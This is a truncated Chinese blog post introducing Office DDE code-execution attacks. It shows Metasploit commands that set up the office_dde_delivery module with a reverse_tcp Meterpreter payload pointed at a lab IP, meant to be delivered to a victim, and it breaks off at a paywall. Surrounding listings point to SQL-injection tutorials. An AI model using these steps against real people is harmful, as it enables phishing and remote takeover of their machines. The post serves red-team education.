【漏洞挖掘】——22、DDE漏洞攻击介绍

已于 2024-06-04 17:45:30 修改
阅读量1.3k 收藏 3
点赞数
分类专栏: 【WEB渗透】 文章标签: 渗透测试 信息安全 网络安全 web渗透
于 2018-03-03 21:30:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/79432998
版权
【WEB渗透】 专栏收录该内容
149 篇文章 11 订阅 ¥29.90 ¥99.00
订阅专栏
本文介绍了DDE(动态数据交换)漏洞攻击,一种利用Microsoft Office功能在不使用宏的情况下执行任意代码的方法。通过Metasploit框架和CactusTorch工具,详细阐述了如何生成有效载荷并诱导受害者执行,以实现远程代码执行。尽管DDE攻击在红队评估中有效,但目前防病毒公司正尝试检测此类攻击,因此混淆技术在创建逃避检测的有效载荷中至关重要。
摘要由CSDN通过智能技术生成
基本介绍

2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估

利用方式
Metasploit

MSF框架中提供了对DDE漏洞的利用模块,我们可以直接使用该模块生成有效载荷并将其投放给受害者用户诱导其点击运行

msf6 > use exploit/windows/fileformat/office_dde_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > show options
msf6 exploit(windows/fileformat/office_dde_delivery) > set SRVHOST 192.168.204.135
SRVHOST => 192.168.204.135
msf6 exploit(windows/fileformat/office_dde_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > set LHOST 192.168.204.135
LHOS
了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
如何运用宽字节实现Sql注入?
MSB_WLAQ的博客
10-08 268
什么是魔术引号 了解一个PHP的防御函数==》magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线 magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤.
Office DDE 攻击
10-24 216
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
编码在网络安全中的应用和原理
最新发布
2401_84466361的博客
06-18 1049
因为一开始计算机只在美国用,要表达的也仅仅是大小写英文单词和一些特殊符号等。于是用八位的字节的01不同顺序来表示一些想表示的符号,所以一共可以组合出256种不同的状态。他们把其中的编号从0开始的32种状态分别规定了特殊的用途,33号以后到127表示一些英文单词,运算符号,阿拉伯数字等。可是之后计算机的普及,导致各个国家都能够使用上计算机,而每个国家又有自己的一些特定符号语言,这之后ASCII哪怕后128位都用上(比如latin1。
宽字节注入实例
vivlol918的博客
06-07 82
宽字节注入是一种针对网站及应用程序的攻击技术,也是一种针对SQL注入的特殊形式。
【SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2500
符号 GBK编码 ’ 27
宽字节注入
buffedon的博客
07-27 278
宽字节注入原理实例找注入点判断列数查询信息总结 原理 利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ascaii要大于128) PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。如上图所示%df’被PHP转义,单引号被加上反斜杠\,变成了%d’,其中\的十六进制是%5C,那么现在%d’=%d%5C%27, 如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK编码时,会认为 %df
通达信指标——神奇DDE(主图).doc
07-30
本篇文章将详细介绍通达信指标——神奇DDE(主图),该指标是一种基于技术分析的股票市场分析工具。通过对指标的解读,可以帮助投资者更好地了解股票市场的走势和趋势。 VAR1:移动平均线 VAR1 是一种移动平均线...
ms office DDE攻击与防御
09-17
### ms office DDE攻击与防御 #### 一、DDE技术概述 动态数据交换(Dynamic Data Exchange, DDE)是一种由Microsoft开发的技术,用于不同应用程序之间的数据交换与通信。这项技术自1987年的Windows 2.0起便被引入...
C语言头文件 DDE.H
06-11
C语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 ...
DDE深度数据挖掘决策系统.pdf
07-13
DDE深度数据挖掘决策系统概述 DDE深度数据挖掘决策系统是一个基于Level-2数据的决策系统,该系统可以对数据进行深入分析和挖掘,以获取有价值的信息。该系统的核心是Level-2基础数据,包括十档买卖盘、总买和总卖、...
DDE通讯开发包
12-10
此外,由于DDE涉及到跨进程的数据交换,所以安全性和错误处理也是开发者需要关注的重点,以防止潜在的注入攻击或资源泄漏。 总的来说,DDE通讯开发包是一个历史性的工具,它见证了Windows API的发展历程,对于学习...
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 575
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4962
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
宽字节(宽字符)注入
Yatere的天平秤
04-24 2021
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
SQL注入 | 宽字节注入2
m_de_g的博客
12-11 1631
SQL注入 | 宽字节注入2 1.宽字节注入基础 最常使用的宽字节注入是利用%df,其实我们只要第一个ASCII码大于128就可以了,比如ASCII码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图所示,然后在十六进制前面加%即可,即为%81 GBK首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F) 2.宽字节注入代码分析 mysql_real_escape_string()和addslashes()功能类似
11、注入篇--宽字节注入
WX公众号-小白学安全
04-05 579
文章目录原理利用防范靶场 原理 利用 防范 靶场
使用VB与组态王实现数据实时交换——DDE技术详解
本文主要介绍了如何利用Visual Basic (VB) 应用程序与组态王(Kingview)进行实时数据交换,以便在VB程序中获取和显示来自组态王系统的实时数据。组态王是一款流行的工业自动化监控软件,而VB应用程序则作为客户端,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值